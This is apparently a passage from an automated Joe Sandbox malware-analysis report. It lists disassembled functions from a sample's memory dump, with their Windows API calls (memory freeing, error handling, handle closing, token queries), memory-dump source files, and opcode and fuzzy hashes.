                                                                                                                                                                                                                                                                                                        • Opcode ID: 8caa8b13ade8b474045bb738814b9b2904853cf4e92cc0b0d89d4f773a90fb0a
                                                                                                                                                                                                                                                                                                        • Instruction ID: d592a18ed451c286e009150fa3c29aebafb6ef4ef68113651ed9bec4d2e2058b
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8caa8b13ade8b474045bb738814b9b2904853cf4e92cc0b0d89d4f773a90fb0a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8601B9B17007057BE75156159C82FAF737EAF4139CB044065FD4A9B20BE7ABED10D1A1
                                                                                                                                                                                                                                                                                                        Function 00FE316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(0000000A,?,?,00FDF64E,00FD545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00FE3170
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE31A5
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE31CC
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00FE31D9
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00FE31E2
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7bab8987a3dc3ab22062d1970a275edf9ff1ce4126466a54d2306b459ce022c6
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5c0c833c34a68297e38b674a31f25b899ff6b4a7bfcefa5b19b70a78106dd2f5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bab8987a3dc3ab22062d1970a275edf9ff1ce4126466a54d2306b459ce022c6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E01F9B6E446C03B96223677AC8DE2B366D9FD1772320042DF955A3281EE2FCA017350
                                                                                                                                                                                                                                                                                                        Function 010108FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?,?,01010C4E), ref: 0101091B
                                                                                                                                                                                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010936
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010944
                                                                                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?), ref: 01010954
                                                                                                                                                                                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,01010831,80070057,?,?), ref: 01010960
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3647212021dd4129ea440e2f9ea06b248c9610131c711ed3671930f90b7c71ac
                                                                                                                                                                                                                                                                                                        • Instruction ID: a1d8b52ddbb52f8d6281a24953dd7ef6427cdc3d3e140e536304fef3c6e5b21c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3647212021dd4129ea440e2f9ea06b248c9610131c711ed3671930f90b7c71ac
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F701D4B6600205AFFB114F98CC44BAA7EEEEB44751F100118FAC5D6108E77ACD808760
                                                                                                                                                                                                                                                                                                        Function 0101F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0101F2AE
                                                                                                                                                                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0101F2BC
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 0101F2C4
                                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0101F2CE
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 0101F30A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 58c90fd2860d8313866d1ad96a6c1fab152a51cde64b2602040e07da9ecf718f
                                                                                                                                                                                                                                                                                                        • Instruction ID: 1a827289fea528d729664ae274dd844b0d4fa8fb6a69640f7a386073c74e5489
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58c90fd2860d8313866d1ad96a6c1fab152a51cde64b2602040e07da9ecf718f
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6301C074D0011EEBCF10AFF4D988AEDBB78FF08300F000046EA82B2248CB399158C7A1
                                                                                                                                                                                                                                                                                                        Function 01011A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01011A60
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A6C
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A7B
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,010114E7,?,?,?), ref: 01011A82
                                                                                                                                                                                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 01011A99
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 78b4fa03d5724f0f03f75b4e76b5984c84fa074cd2536a345f819f693d0b96d0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9a1cb2d5f558ebb1b5986a42ffa6c9ae6638f328c16870082f6b7f97ef0e05e0
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 78b4fa03d5724f0f03f75b4e76b5984c84fa074cd2536a345f819f693d0b96d0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF0181B9600205BFDB254FA8ED88D6A3FADEF882A4B210458FD85C3254DA36DC40CB60
                                                                                                                                                                                                                                                                                                        Function 01011900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 01011916
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 01011922
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 01011931
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 01011938
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0101194E
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 69a3a464636459f84c50ee4c1e469d97e993db54746a2e8a8fd093a079d2bf5c
                                                                                                                                                                                                                                                                                                        • Instruction ID: a832b8471ec82cdd4e27d9b0ccc0d21e274eb5cfe570606037f31fc8c7d188ab
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69a3a464636459f84c50ee4c1e469d97e993db54746a2e8a8fd093a079d2bf5c
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23F062B9200301BBDB220FA9ED8DF563BAEEF897A1F104415FE85D7255CA79D8108B60
                                                                                                                                                                                                                                                                                                        Function 01011960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01011976
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01011982
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01011991
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01011998
                                                                                                                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 010119AE
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 75a15c96e0a9cebcd2b7f06ea3c7ee263345fb25e70cb6bee6a6e0196042cbd0
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7506b3d1e1ea5348a3bb01abbf2c9acb3135c09a886aed86b1ed82212df4d1c8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75a15c96e0a9cebcd2b7f06ea3c7ee263345fb25e70cb6bee6a6e0196042cbd0
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2FF062B9200301BBD7224FA8ED89F563BAEEF896A1F100414FE85C7255CA79D8108B60
                                                                                                                                                                                                                                                                                                        Function 01020CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CCB
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CD8
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CE5
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CF2
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020CFF
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,01020B24,?,01023D41,?,00000001,00FF3AF4,?), ref: 01020D0C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: c54f87253ee97c01304dc245f7873687786a940b50e5e34cffd7f72fdf529cc6
                                                                                                                                                                                                                                                                                                        • Instruction ID: ffaecd406d369f09fc7c8750ec05ac452417ed3935096463087782279f6eb358
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c54f87253ee97c01304dc245f7873687786a940b50e5e34cffd7f72fdf529cc6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2701A2B1801B29DFDB30AF6AD980816FBF5BF502153258A7FE2D652921C7B1A944DF80
                                                                                                                                                                                                                                                                                                        Function 010165AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 010165BF
                                                                                                                                                                                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 010165D6
                                                                                                                                                                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 010165EE
                                                                                                                                                                                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 0101660A
                                                                                                                                                                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 01016624
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e00409d2e2f102f36dcf0487d5a31fa55044355400ac523efec5dcdc33fb940a
                                                                                                                                                                                                                                                                                                        • Instruction ID: 772f847e2df493f3fd51ea67f55a6d6e3d88c7c1ae27492b5f10ba3533e0c9fc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e00409d2e2f102f36dcf0487d5a31fa55044355400ac523efec5dcdc33fb940a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8401A974500314ABEB315F64DE8EB9A7BB8FF14705F000599B6C7610D5DBFAA644CB50
                                                                                                                                                                                                                                                                                                        Function 00FEDABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDAD2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4), ref: 00FE2D4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: GetLastError.KERNEL32(01081DC4,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4,01081DC4), ref: 00FE2D60
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDAE4
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDAF6
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDB08
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDB1A
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 556337c31c14d2cbcc2c6d8fdcdc3a7ab0cd982c65c250d815c6b5f1c2b9867e
                                                                                                                                                                                                                                                                                                        • Instruction ID: 8dbdb46b975589e9d8485f58a0204f479d54687c101067883f363e9c306dd311
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 556337c31c14d2cbcc2c6d8fdcdc3a7ab0cd982c65c250d815c6b5f1c2b9867e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6F01232D44288AB86B4EB9AEDC1C1EB7DDFE447207950C05F149E7905DB39FC809754
                                                                                                                                                                                                                                                                                                        Function 00FE2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE262E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4), ref: 00FE2D4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: GetLastError.KERNEL32(01081DC4,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4,01081DC4), ref: 00FE2D60
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE2640
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE2653
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE2664
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FE2675
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 01338b0aa4dcb14bc26cac8a82f8d7cf3125b44b1c708ddd424d86e0dc87d179
                                                                                                                                                                                                                                                                                                        • Instruction ID: 3132c4227f57e250dd5444306d0deeeb02cd96d964a5a4bd9b8886e6daa4916d
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 01338b0aa4dcb14bc26cac8a82f8d7cf3125b44b1c708ddd424d86e0dc87d179
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6AF0D0748051549B86B1AF95EC4184C77A8BF247613050606F5D4A626ED73E0912FF94
